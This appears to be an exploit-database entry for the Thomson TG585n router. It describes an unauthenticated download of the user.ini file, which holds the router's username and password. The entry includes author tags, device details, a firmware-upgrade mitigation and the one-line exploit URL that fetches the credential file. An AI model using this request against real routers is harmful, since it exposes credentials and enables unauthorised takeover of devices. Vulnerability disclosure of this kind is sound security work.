header-logo
Suggest Exploit
vendor:
TG585n
by:
AnTi SeCuRe

THOMSON TG585n (user.ini) Arbitrary Download Vulnerability

A vulnerability in the Thomson TG585n router allows an attacker to download the user.ini file without authentication. This file contains the username and password of the router, which can be used to gain access to the router's web interface.

Mitigation:

Upgrade to the latest version of the router's firmware.
Source

Exploit-DB raw data:

THOMSON TG585n (user.ini) Arbitrary Download Vulnerability

[~] Author : AnTi SeCuRe
[~] Email : AnTi-SeCuRe@HoTMaiL.coM
[~] TeaM : SauDi ViRuS TeaM
[~] Site : WwW.VxX9.Cc

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

System Information

Product Name: TG585n
Serial Number: CP0810KTJSU
Software Release: 7.4.3.2
Software Variant: AA
Boot Loader Version: 1.0.2
Product Code: 36342870
Board Name: CANT-J

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\



[~] exploit :

[~] http://192.168.1.254./cgi/b/backup/user.ini